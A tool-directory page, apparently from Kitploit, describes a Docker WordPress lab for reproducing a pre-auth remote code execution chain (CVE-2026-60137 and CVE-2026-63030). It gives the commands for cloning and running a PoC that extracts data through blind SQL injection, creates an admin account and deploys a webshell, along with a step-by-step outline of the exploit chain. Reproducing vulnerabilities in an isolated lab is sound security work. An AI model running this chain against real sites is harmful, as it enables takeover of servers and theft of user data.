Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-60137-and-CVE-2026-63030 — Docker-basiertes WordPress-Lab zur Reproduktion von CVE-2026-60137 und CVE-2026-63030 Pre-Auth-RCE, mit einem Python-PoC-Exploit für SQLi, Privilegieneskalation und Webshell-Deployment. | Kitploit
Tools/GitHubGitHub/ivanesk315/cve-2026-60137-and-cve-2026-63030
Privilege EscalationSchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsLernen & BildungPayload-EntwicklungLabs & Praxis

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHubivanesk315/cve-2026-60137-and-cve-2026-63030

CVE-2026-60137-and-CVE-2026-63030

Docker-basiertes WordPress-Lab zur Reproduktion von CVE-2026-60137 und CVE-2026-63030 Pre-Auth-RCE, mit einem Python-PoC-Exploit für SQLi, Privilegieneskalation und Webshell-Deployment.

Repository anzeigen
vor 18h 32mNoch nicht geprüft

wp2shell Lab — CVE-2026-60137 & CVE-2026-63030

WordPress Core Pre-Auth RCE Lab — echte Ausnutzung, RCE-Server.

WARNUNG: Das Lab führt eine VERWUNDBARE WordPress-Instanz aus. Nicht ins Internet exponieren.

Struktur

root@kitploit:~
.
├── docker-compose.yml     # Lab: WordPress 6.9.4 + MariaDB 11 + phpMyAdmin
├── exploit/               # PoC-Exploit (von GitHub geklont)
│   └── wp2shell.py        # Vollständiger RCE-Exploit
├── REPORT.md              # Bericht zur Root-Cause-Analyse
└── README.md

Setup

1. Lab starten

root@kitploit:~
docker compose up -d

Warten, bis LAB READY in den Logs erscheint:

root@kitploit:~
docker compose logs -f wpcli

2. PoC-Exploit klonen

root@kitploit:~
git clone https://github.com/0xsha/wp2shell.git exploit

Dieser Exploit:

  • Python 3.7+, keine pip-Installation nötig (verwendet nur die Standardbibliothek)
  • Erstellt ein neues Admin-Konto, OHNE ein Passwort knacken zu müssen
  • Stellt automatisch eine Webshell bereit
  • Interaktive Shell

3. Ausnutzung

root@kitploit:~
cd exploit

# Check vulnerability (non-destructive)
python wp2shell.py check http://localhost:8080

# Extract data qua blind SQLi
python wp2shell.py read http://localhost:8080 --preset users

# RCE — tạo admin + deploy webshell + chạy command
python wp2shell.py shell http://localhost:8080 --cmd id

# Interactive shell
python wp2shell.py shell http://localhost:8080 -i

Services

Exploit-Ablauf zusammengefasst

root@kitploit:~
1. POST /wp-json/batch/v1
   └─ Sub-request[0]: malformed path → parse error
   └─ Sub-request[1]: /wp/v2/posts + author_exclude=<SQLi>
   └─ Sub-request[2]: sacrificial route
   → $matches[] bị lệch index → req[1] nhận handler của req[2]
   → bypass permission_callback → SQLi vào WP_Query

2. SQL Injection (author__not_in)
   → Scalar string bypass is_array() check
   → Raw SQL inject vào WHERE clause

3. Object Hydration → oEmbed Write → Parent Loop Repair
   → Poisoned WP_Post objects persist vào database

4. Changeset Privilege Escalation
   → WordPress switch current_user sang admin

5. Nested REST Request
   → Tạo admin account mới (không cần crack password)

6. Login + Upload webshell plugin → RCE

Patch überprüfen

root@kitploit:~
# Update WordPress trong container
docker exec -it wp2shell-lab-wp-1 bash -c \
  "curl -sO https://raw.githubusercontent.com/wp-cli/builds/gh-pages/phar/wp-cli.phar && \
   chmod +x wp-cli.phar && \
   ./wp-cli.phar core update --version=6.9.5 --allow-root"

# Re-run exploit — phải fail
python exploit/wp2shell.py check http://localhost:8080

Cleanup

root@kitploit:~
docker compose down -v

References

  • 0xsha/wp2shell — GitHub
  • Picus: wp2shell RCE Explained
  • zsec.uk: Code Trace Deep Dive
  • VulnCheck Blog
  • Tenable FAQ
Tool herunterladen
ServiceURLCredentials
WordPresshttp://localhost:8080admin / Admin!2345
WP Adminhttp://localhost:8080/wp-adminadmin / Admin!2345
phpMyAdminhttp://localhost:8081root / root
REST APIhttp://localhost:8080/wp-json/—
Batch endpointhttp://localhost:8080/wp-json/batch/v1—